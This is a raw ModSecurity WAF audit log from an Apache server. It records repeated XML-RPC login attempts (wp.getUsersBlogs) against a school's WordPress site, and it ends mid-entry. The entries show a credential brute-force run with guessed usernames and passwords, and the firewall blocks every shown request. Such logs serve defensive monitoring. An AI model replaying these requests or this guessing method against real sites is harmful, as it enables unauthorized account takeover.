1745513973193984 4879 (- - -) Stopwatch2: 1745513973193984 4879; combined=3896, p1=503, p2=3150, p3=0, p4=0, p5=138, sr=149, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d94cfc13-Z-- --e74fab53-A-- [25/Apr/2025:00:00:28 +0700] aApuLMlQo524fhbIj1yI8QAAABU 103.236.140.4 49598 103.236.140.4 8181 --e74fab53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e74fab53-C-- wp.getUsersBlogs wakasarpras chicken --e74fab53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e74fab53-E-- --e74fab53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514028520181 5189 (- - -) Stopwatch2: 1745514028520181 5189; combined=3701, p1=441, p2=3092, p3=0, p4=0, p5=98, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e74fab53-Z-- --1e90471d-A-- [25/Apr/2025:00:01:28 +0700] aApuaGLuk3f9kLjsdTaGngAAAIU 103.236.140.4 52092 103.236.140.4 8181 --1e90471d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1e90471d-C-- wp.getUsersBlogs wakasarpras xbox360 --1e90471d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e90471d-E-- --1e90471d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514088132236 4163 (- - -) Stopwatch2: 1745514088132236 4163; combined=2747, p1=371, p2=2233, p3=0, p4=0, p5=83, sr=77, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e90471d-Z-- --f408bf24-A-- [25/Apr/2025:00:02:28 +0700] aApupGLuk3f9kLjsdTaHKAAAAIQ 103.236.140.4 54684 103.236.140.4 8181 --f408bf24-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f408bf24-C-- wp.getUsersBlogs wakasarpras manunited --f408bf24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f408bf24-E-- --f408bf24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (119+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514148737962 5525 (- - -) Stopwatch2: 1745514148737962 5525; combined=3864, p1=468, p2=3198, p3=0, p4=0, p5=113, sr=99, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f408bf24-Z-- --a1e86116-A-- [25/Apr/2025:00:03:28 +0700] aApu4MlQo524fhbIj1yK3gAAAA8 103.236.140.4 56980 103.236.140.4 8181 --a1e86116-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a1e86116-C-- wp.getUsersBlogs kasubagtu kasubagtu1987 --a1e86116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1e86116-E-- --a1e86116-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514208025849 4435 (- - -) Stopwatch2: 1745514208025849 4435; combined=3129, p1=393, p2=2591, p3=0, p4=0, p5=85, sr=80, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1e86116-Z-- --2e69fd6a-A-- [25/Apr/2025:00:04:28 +0700] aApvHN5yz20UX9VrdZPLTQAAAFc 103.236.140.4 59648 103.236.140.4 8181 --2e69fd6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2e69fd6a-C-- wp.getUsersBlogs kasubagtu marketing2021 --2e69fd6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e69fd6a-E-- --2e69fd6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514268189295 5330 (- - -) Stopwatch2: 1745514268189295 5330; combined=3827, p1=452, p2=3182, p3=0, p4=0, p5=123, sr=94, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e69fd6a-Z-- --f32b0f27-A-- [25/Apr/2025:00:05:28 +0700] aApvWGLuk3f9kLjsdTaJOAAAAJE 103.236.140.4 34008 103.236.140.4 8181 --f32b0f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f32b0f27-C-- wp.getUsersBlogs kasubagtu qweasd --f32b0f27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f32b0f27-E-- --f32b0f27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514328165496 5276 (- - -) Stopwatch2: 1745514328165496 5276; combined=3778, p1=448, p2=3153, p3=0, p4=0, p5=103, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f32b0f27-Z-- --596c2c39-A-- [25/Apr/2025:00:06:28 +0700] aApvlGLuk3f9kLjsdTaKKgAAAI0 103.236.140.4 36576 103.236.140.4 8181 --596c2c39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --596c2c39-C-- wp.getUsersBlogs kasubagtu 456321 --596c2c39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --596c2c39-E-- --596c2c39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514388308988 4872 (- - -) Stopwatch2: 1745514388308988 4872; combined=3417, p1=478, p2=2777, p3=0, p4=0, p5=94, sr=143, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --596c2c39-Z-- --9ee55670-A-- [25/Apr/2025:00:07:16 +0700] aApvxN5yz20UX9VrdZPNRAAAAE4 103.236.140.4 38592 103.236.140.4 8181 --9ee55670-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9ee55670-C-- wp.getUsersBlogs kasubagtu 1234%^&* --9ee55670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ee55670-E-- --9ee55670-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514436296778 6323 (- - -) Stopwatch2: 1745514436296778 6323; combined=4577, p1=614, p2=3754, p3=0, p4=0, p5=124, sr=161, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ee55670-Z-- --67f2e141-A-- [25/Apr/2025:00:07:28 +0700] aApv0MlQo524fhbIj1yNjgAAAAc 103.236.140.4 39088 103.236.140.4 8181 --67f2e141-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 231 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --67f2e141-C-- wp.getUsersBlogs kasubagtu administrator123 --67f2e141-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67f2e141-E-- --67f2e141-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514448080834 5439 (- - -) Stopwatch2: 1745514448080834 5439; combined=3911, p1=467, p2=3273, p3=0, p4=0, p5=100, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67f2e141-Z-- --181e7b76-A-- [25/Apr/2025:00:08:28 +0700] aApwDGLuk3f9kLjsdTaLVAAAAJA 103.236.140.4 41532 103.236.140.4 8181 --181e7b76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --181e7b76-C-- wp.getUsersBlogs kasubagtu mustang --181e7b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --181e7b76-E-- --181e7b76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514508354771 5381 (- - -) Stopwatch2: 1745514508354771 5381; combined=3834, p1=474, p2=3171, p3=0, p4=0, p5=109, sr=87, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --181e7b76-Z-- --af5d3174-A-- [25/Apr/2025:00:09:28 +0700] aApwSPiVYlyO1xhz7yO41QAAAMk 103.236.140.4 43560 103.236.140.4 8181 --af5d3174-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af5d3174-C-- wp.getUsersBlogs kasubagtu cowboys --af5d3174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af5d3174-E-- --af5d3174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514568199097 5736 (- - -) Stopwatch2: 1745514568199097 5736; combined=4117, p1=542, p2=3376, p3=0, p4=0, p5=115, sr=90, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af5d3174-Z-- --f8d11d7b-A-- [25/Apr/2025:00:10:28 +0700] aApwhPiVYlyO1xhz7yO5ZQAAAMg 103.236.140.4 46158 103.236.140.4 8181 --f8d11d7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f8d11d7b-C-- wp.getUsersBlogs administrator password --f8d11d7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d11d7b-E-- --f8d11d7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514628203090 5085 (- - -) Stopwatch2: 1745514628203090 5085; combined=3856, p1=452, p2=3207, p3=0, p4=0, p5=113, sr=89, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d11d7b-Z-- --d0263a49-A-- [25/Apr/2025:00:11:28 +0700] aApwwGLuk3f9kLjsdTaNRQAAAJU 103.236.140.4 48826 103.236.140.4 8181 --d0263a49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d0263a49-C-- wp.getUsersBlogs administrator smkn22-jkt.sch.id --d0263a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0263a49-E-- --d0263a49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514688290830 5330 (- - -) Stopwatch2: 1745514688290830 5330; combined=4188, p1=515, p2=3490, p3=0, p4=0, p5=108, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0263a49-Z-- --8c205707-A-- [25/Apr/2025:00:12:28 +0700] aApw_GLuk3f9kLjsdTaNywAAAI0 103.236.140.4 51134 103.236.140.4 8181 --8c205707-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 242 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8c205707-C-- wp.getUsersBlogs administrator smkn22-jkt_sch_id123456 --8c205707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c205707-E-- --8c205707-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514748335589 4936 (- - -) Stopwatch2: 1745514748335589 4936; combined=3859, p1=445, p2=3226, p3=0, p4=0, p5=109, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c205707-Z-- --fa921958-A-- [25/Apr/2025:00:13:28 +0700] aApxOGLuk3f9kLjsdTaOgQAAAIs 103.236.140.4 53642 103.236.140.4 8181 --fa921958-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fa921958-C-- wp.getUsersBlogs administrator tests --fa921958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa921958-E-- --fa921958-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745514808000723 4839 (- - -) Stopwatch2: 1745514808000723 4839; combined=3579, p1=431, p2=2945, p3=0, p4=0, p5=116, sr=89, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa921958-Z-- --b565ad57-A-- [25/Apr/2025:00:14:28 +0700] aApxdMlQo524fhbIj1yR-gAAAAs 103.236.140.4 56128 103.236.140.4 8181 --b565ad57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b565ad57-C-- wp.getUsersBlogs administrator admini --b565ad57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b565ad57-E-- --b565ad57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 